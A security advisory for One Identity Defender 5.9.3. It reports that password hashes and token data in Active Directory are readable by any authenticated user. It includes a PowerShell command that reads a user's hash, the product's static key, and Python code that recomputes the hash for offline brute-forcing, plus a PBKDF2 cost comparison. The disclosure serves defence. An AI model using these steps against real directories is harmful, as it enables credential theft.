Title: One Identity Defender - Insecure Cryptographic Storage  
Date: 01 September 2019  
  
Affected Software:  
==================  
One Identity Defender 5.9.3  
Other versions are likely also vulnerable.  
  
Insecure Cryptographic Storage:  
==============================  
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed with MD5 over a static key, the password and the user's objectGUID; because the key is fixed rather than secret, it provides obfuscation only. The computed hash can therefore be read from the defender-userTokenData attribute in Active Directory by any authenticated user and used in an offline brute-force attack.  
  
Hash Retrieval:  
  
PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData  
  
DistinguishedName ObjectGUID defender-userTokenData  
----------------- ---------- ----------------------  
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...  
  
Hash Calculation:  
  
#!/usr/bin/env python3  
import binascii  
import hashlib  
import uuid  
  
guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'   # the user's objectGUID, as returned by Get-ADUser above  
password = 'secret'  
key = '45f88b08118bf03b8d55e452f77c2e8b'       # static key used by Defender for obfuscation  
  
# The GUID is used in its little-endian (on-the-wire) form: the first three  
# fields are byte-swapped, the remaining eight bytes are kept as they are.  
guid_bytes = uuid.UUID(guid).bytes_le  
  
# The password is used as UTF-16LE, i.e. each character followed by a NUL byte.  
password_bytes = password.encode('utf-16-le')  
  
# hash = MD5(static key || UTF-16LE(password) || little-endian objectGUID)  
data = binascii.unhexlify(key) + password_bytes + guid_bytes  
  
print(hashlib.md5(data).hexdigest())  
  
[duras@qonos ~]$ ./hash.py  
d1f541f69c63315dd85fbbdb7b4dc9e5  
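The following script is an added example, not part of the advisory and not One Identity's code. It reproduces the hash construction described above with the advisory's own key and objectGUID, and sets it beside a conventional password verifier (PBKDF2-HMAC-SHA256 with a per-user random salt and a constant-time comparison) so the cost per guess of the two can be measured side by side. The PBKDF2 parameters (600,000 iterations, 16-byte salt) are assumptions chosen for the comparison; they are not a statement about how Defender should or does store anything.

```python
#!/usr/bin/env python3
"""Contrast the Defender token-hash construction with a salted, iterated KDF."""
import hashlib
import hmac
import os
import time
import uuid

# Values taken from the advisory: the static key and the example user's objectGUID.
DEFENDER_KEY = bytes.fromhex('45f88b08118bf03b8d55e452f77c2e8b')
EXAMPLE_GUID = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'

# Assumed parameters for the hardened comparison (not Defender's own).
PBKDF2_ITERATIONS = 600_000
SALT_LEN = 16


def defender_token_hash(guid: str, password: str, key: bytes = DEFENDER_KEY) -> str:
    """MD5(static key || UTF-16LE(password) || little-endian objectGUID), as in the advisory."""
    data = key + password.encode('utf-16-le') + uuid.UUID(guid).bytes_le
    return hashlib.md5(data).hexdigest()


def pbkdf2_hash(password: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> str:
    """A conventional verifier: per-user random salt plus a deliberately slow KDF."""
    dk = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, iterations)
    return dk.hex()


def verify_pbkdf2(password: str, salt: bytes, expected_hex: str,
                  iterations: int = PBKDF2_ITERATIONS) -> bool:
    """Recompute and compare in constant time, so the check itself leaks nothing."""
    candidate = pbkdf2_hash(password, salt, iterations)
    return hmac.compare_digest(candidate, expected_hex)


def seconds_per_evaluation(fn, repetitions: int) -> float:
    """Average wall-clock cost of one call to fn()."""
    start = time.perf_counter()
    for _ in range(repetitions):
        fn()
    return (time.perf_counter() - start) / repetitions


if __name__ == '__main__':
    # Reproduces the value shown in the advisory for user Martok / password 'secret'.
    print('Defender hash      :', defender_token_hash(EXAMPLE_GUID, 'secret'))

    salt = os.urandom(SALT_LEN)          # fresh per-user salt (constructed here)
    stored = pbkdf2_hash('secret', salt)
    print('PBKDF2 verifier    :', stored)
    print('verify ok          :', verify_pbkdf2('secret', salt, stored))

    # Cost per guess is what decides whether an offline attack is practical.
    md5_cost = seconds_per_evaluation(lambda: defender_token_hash(EXAMPLE_GUID, 'secret'), 20_000)
    kdf_cost = seconds_per_evaluation(lambda: pbkdf2_hash('secret', salt), 1)
    print(f'Defender hash      : {md5_cost * 1e6:8.2f} us per evaluation')
    print(f'PBKDF2 ({PBKDF2_ITERATIONS} it): {kdf_cost * 1e3:8.1f} ms per evaluation')
    print(f'cost ratio         : ~{kdf_cost / md5_cost:,.0f}x')
```

Two things are worth noting from the output. The objectGUID does vary per user, so it behaves like a salt and stops a single precomputed table from covering every account; what it does not change is that each guess costs one MD5 over 44 bytes, and the only other secret in the construction is a key that is identical everywhere. The PBKDF2 side shows the property a password store actually needs: the per-guess cost is set by the iteration count and can be raised over time without touching the stored salt format.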
  
Contact:  
========  
spicyitalian[at]protonmail[dot]com